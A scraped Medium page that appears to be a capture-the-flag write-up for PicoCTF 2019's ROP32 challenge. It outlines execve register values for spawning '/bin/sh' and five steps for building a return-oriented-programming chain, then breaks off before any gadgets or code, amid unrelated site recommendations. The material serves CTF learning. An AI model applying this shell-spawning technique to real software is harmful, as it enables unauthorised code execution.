ROP32 — PicoCTF2019




### Gathering

  • eax == 0xb (11 in dec)
  • ebx == address in the memory of the string ‘/bin/sh’
  • ecx == a pointer point to the address of ‘/bin/sh’
  • edx == NULL (\x00)


  • first we found all the suitable gadgets to trigger the syscall
  • I myself need to specify a clear way to solve this challenge xD
  • Step 1 — Write-what-where gadgets
  • Step 2 — Init syscall number gadgets
  • Step 3 — Init syscall arguments gadgets
  • Step 4 — Syscall gadget
  • Step 5 — Build the ROP chain
  • i’m using the following gadgets to write it:




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Automatically transforming a classic SharePoint Site into a modern one

Week 2: Real and Virtual Worlds

OneTable CLI for DynamoDB Migrations

Pair Programming Made me a Better Developer

2 Brains Are Better Than 1

The definitive guide to running EC2 Spot Instances as Kubernetes worker nodes

from Twitter


Jenkins Container for Build Pipeline to test the app on Kubernetes Cluster

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nguyễn Tín

Nguyễn Tín

a loner

More from Medium

Sensible Soccer : For the Love of a Game

FPL 2022–23 Season To Come & What Came Before

Boosting Cyber Resilience

Kid Kelleher The Kop Hero!